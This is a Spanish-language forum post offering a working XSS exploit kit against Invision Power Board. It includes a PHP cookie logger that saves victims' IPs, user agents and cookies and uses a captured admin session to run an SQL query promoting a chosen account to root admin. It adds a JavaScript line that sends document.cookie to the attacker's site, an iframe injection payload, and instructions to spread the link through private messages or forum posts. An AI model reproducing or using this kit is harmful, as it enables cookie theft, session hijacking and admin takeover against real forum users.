Pues bien, a petecion de un user, pongo un muy buen exploits de XSS para Invision Power Board.
Cread un nuevo archivo con la extension .php, por ejemplo INVISION.php e introducid esto
<?php
$target = "http://FORODETUVICTIMA.COM"; #Target forum without trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";
$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<iframe width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql§ion=admin&query=UPDATE+'.$prefix.'members+SET+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.$member.'%27&st="></iframe>';
}
?>
Ahora cread en vuestro servidor un archivo llamado log.txt y ponedle el permiso chmod a 777
Ahora, cread otro archivo llamado script.js y meteis esto
document.location="http://TUSITIO.com/INVISION.php?c="+document.cookie;
ahora cread un archiv con extension .html, por ejemplo PRUEBA.html y meteis esto
<iframe border=0 src="http://www.VICTIMA.com/jscripts/folder_rte_files/module_table.php?editorid=//--></script><script src=http://www.TUSITIO.com/script.js>" width=0 height=0></iframe>
bien, ahora simplemente teneis que mandar el link PRUEBA.html por mensaje privado o posteadlo en el foro en cuestion, y en el archivo log.txt se escribiran las cookies de los usuarios, dudas preguntadlas aqui ^^
Autor